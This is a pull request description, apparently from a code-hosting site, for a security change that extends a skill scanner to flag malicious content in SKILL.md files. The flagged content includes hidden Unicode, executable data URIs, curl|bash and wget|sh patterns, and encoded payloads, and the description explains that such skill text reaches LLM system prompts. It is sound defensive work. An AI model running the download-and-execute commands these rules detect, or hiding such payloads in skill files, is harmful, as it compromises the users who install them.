#10705: security: extend skill scanner to detect threats in markdown skill definitions
stale
## Summary
Extends the skill scanner to detect security threats in markdown files (`.md`), closing a gap where malicious content in `SKILL.md` skill definitions could bypass code-only scanning.
**Motivation:** The ClawHavoc advisory revealed 341+ malicious ClawHub skills. While VirusTotal scans code files for known malware signatures, skill metadata lives in markdown (`SKILL.md`) — which was previously unscanned. Attackers can embed download-and-execute patterns, obfuscated payloads, hidden Unicode (Trojan Source / CVE-2021-42574), and executable data URIs in skill documentation that gets injected into LLM system prompts.
**Changes:**
- Split `SCANNABLE_EXTENSIONS` into `CODE_EXTENSIONS` and `MARKDOWN_EXTENSIONS` to enable file-type-specific rule routing
- Added `isMarkdown()` helper and route `scanSource()` to use markdown-specific rules for `.md` files
- **New markdown line rules:** `hidden-unicode` (zero-width + bidi override characters), `markdown-data-uri` (executable MIME types)
- **New markdown source rules:** `markdown-download-exec` (`curl|bash` patterns), `markdown-encoded-payload` (large base64 in code blocks), `markdown-hex-payload` (hex-encoded sequences)
- Existing code rules (`eval`, `child_process`, etc.) are isolated from markdown files to prevent false positives on documentation examples
**Rule isolation:** Code-specific rules only fire on code files; markdown-specific rules only fire on `.md` files. This prevents breaking existing scanner behavior while extending coverage.
## Test plan
- [x] All 39 tests pass (13 original + 26 new)
- [x] New tests cover: zero-width Unicode, RTL overrides, data URIs, curl|bash, wget|sh, large base64 blocks, hex payloads
- [x] Rule isolation verified: code rules don't fire on `.md`, markdown rules don't fire on `.ts`
- [x] Clean `SKILL.md` produces zero findings
- [x] Directory scanning and summary counting work with mixed file types
- [x] `oxlint` passes with 0 warnings/errors
- [x] `tsgo` type checking passes
```bash
pnpm vitest run src/security/skill-scanner.test.ts
```
🤖 Generated with [Claude Code](https://claude.com/claude-code)
Co-Authored-By: Claude Opus 4.6 <noreply@anthropic.com>
<!-- greptile_comment -->
<h2>Greptile Overview</h2>
<h3>Greptile Summary</h3>
- Extends the skill scanner to treat `.md` as scannable and routes markdown files through a new set of markdown-specific rules.
- Adds markdown line rules to detect hidden Unicode/BiDi characters and executable `data:` URIs.
- Adds markdown source rules to flag download-and-execute patterns, large base64 blocks in fenced code, and hex-encoded payload strings.
- Updates tests to cover new markdown findings, directory scanning of `SKILL.md`, summary counting, and rule isolation between code vs markdown.
<h3>Confidence Score: 3/5</h3>
- This PR is likely safe to merge, but a couple of detection rules are brittle and can cause missed detections or noisy false positives.
- Core change (routing `.md` to markdown-specific rules and expanding scannable extensions) is straightforward and well-tested. Main concerns are (1) regex statefulness in `scanSource` if any rule regex acquires `g/y` flags, and (2) markdown base64 and download/exec heuristics being either overly broad (false positives) or too narrow (missed common patterns), which undermines scanner correctness.
- src/security/skill-scanner.ts
<!-- greptile_other_comments_section -->
<!-- /greptile_comment -->
Most Similar PRs
#13012: Security: detect invisible Unicode in skills and plugins (ASCII smu...
by agentwuzzi · 2026-02-10
88.1%
#17502: feat: normalize skill scanner reason codes and trust messaging
by ArthurzKV · 2026-02-15
81.3%
#20266: feat: skills-audit — Phase 1 security scanner for installed skills
by theMachineClay · 2026-02-18
79.9%
#10559: feat(security): add plugin output scanner for prompt injection dete...
by DukeDeSouth · 2026-02-06
79.5%
#13894: feat(security): add manifest scanner for SKILL.md trust analysis
by jdrhyne · 2026-02-11
79.4%
#11032: fix(security): block plugin install/load on critical source scan fi...
by coygeek · 2026-02-07
79.3%
#8075: fix(skills): add --ignore-scripts to all package managers
by yubrew · 2026-02-03
79.0%
#22306: Warn on malformed skill parsing failures in load path
by AIflow-Labs · 2026-02-21
78.2%
#10530: fix: tighten skill scanner false positives and add vm module detection
by abdelsfane · 2026-02-06
77.8%
#20106: security: MAESTRO threat mitigations (LM-001, SC-003, AF-005, DI-00...
by kenhuangus · 2026-02-18
76.4%